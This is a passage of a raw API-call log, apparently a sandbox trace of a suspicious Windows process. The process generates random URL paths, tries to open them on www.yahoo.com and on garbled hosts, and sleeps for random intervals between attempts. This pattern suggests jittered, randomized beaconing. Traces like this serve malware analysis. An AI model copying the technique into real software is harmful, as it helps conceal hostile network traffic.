(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.445] GetProcessHeap () returned 0x440000 [0247.445] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0247.445] lstrcpyA (in: lpString1=0x4741c0, lpString2="H\x1e\x13Ës://www.yahoo.com" | out: lpString1="H\x1e\x13Ës://www.yahoo.com") returned="H\x1e\x13Ës://www.yahoo.com" [0247.445] lstrcatA (in: lpString1="H\x1e\x13Ës://www.yahoo.com", lpString2="/twjmbQdpAmbzxHfmqrbbodc/3vmBbge5x36t2OYjqzma/" | out: lpString1="H\x1e\x13Ës://www.yahoo.com/twjmbQdpAmbzxHfmqrbbodc/3vmBbge5x36t2OYjqzma/") returned="H\x1e\x13Ës://www.yahoo.com/twjmbQdpAmbzxHfmqrbbodc/3vmBbge5x36t2OYjqzma/" [0247.446] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0247.446] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="H\x1e\x13Ës://www.yahoo.com/twjmbQdpAmbzxHfmqrbbodc/3vmBbge5x36t2OYjqzma/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0247.446] GetProcessHeap () returned 0x440000 [0247.446] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0247.446] GetProcessHeap () returned 0x440000 [0247.446] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b3a0 | out: hHeap=0x440000) returned 1 [0247.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0247.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0247.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0247.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0247.449] Sleep (dwMilliseconds=0x14f60) [0247.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0247.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.572] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.572] GetProcessHeap () returned 0x440000 [0247.572] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5070 [0247.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5071, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x4f5071) returned 0x0 [0247.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.580] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.580] GetProcessHeap () returned 0x440000 [0247.580] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0247.580] lstrcpyA (in: lpString1=0x472900, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0247.580] lstrcatA (in: lpString1="\x81\x03", lpString2="/mox7xSYHtojp4twpzxr3cbB5xa8yz6ci/" | out: lpString1="\x81\x03/mox7xSYHtojp4twpzxr3cbB5xa8yz6ci/") returned="\x81\x03/mox7xSYHtojp4twpzxr3cbB5xa8yz6ci/" [0247.580] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0247.580] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/mox7xSYHtojp4twpzxr3cbB5xa8yz6ci/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0247.580] GetProcessHeap () returned 0x440000 [0247.581] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0247.581] GetProcessHeap () returned 0x440000 [0247.581] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5070 | out: hHeap=0x440000) returned 1 [0247.581] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0247.581] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0247.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0247.582] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0247.582] Sleep (dwMilliseconds=0x11a65) [0247.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0247.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.742] GetProcessHeap () returned 0x440000 [0247.742] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5270 [0247.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5271, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4f5271) returned 0x0 [0247.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.748] GetProcessHeap () returned 0x440000 [0247.748] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0247.748] lstrcpyA (in: lpString1=0x473b90, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0247.748] lstrcatA (in: lpString1="\x04", lpString2="/CrEvbqw7d2ghtj5qt8tKFazb/" | out: lpString1="\x04/CrEvbqw7d2ghtj5qt8tKFazb/") returned="\x04/CrEvbqw7d2ghtj5qt8tKFazb/" [0247.748] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0247.748] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/CrEvbqw7d2ghtj5qt8tKFazb/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0247.748] GetProcessHeap () returned 0x440000 [0247.748] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0247.748] GetProcessHeap () returned 0x440000 [0247.748] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5270 | out: hHeap=0x440000) returned 1 [0247.749] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0247.749] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0247.749] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0247.749] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0247.749] Sleep (dwMilliseconds=0x1d371) [0247.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0247.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.860] GetProcessHeap () returned 0x440000 [0247.860] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4fb0 [0247.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0247.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4fb1, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x4f4fb1) returned 0x0 [0247.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0247.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0247.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0247.863] GetProcAddress 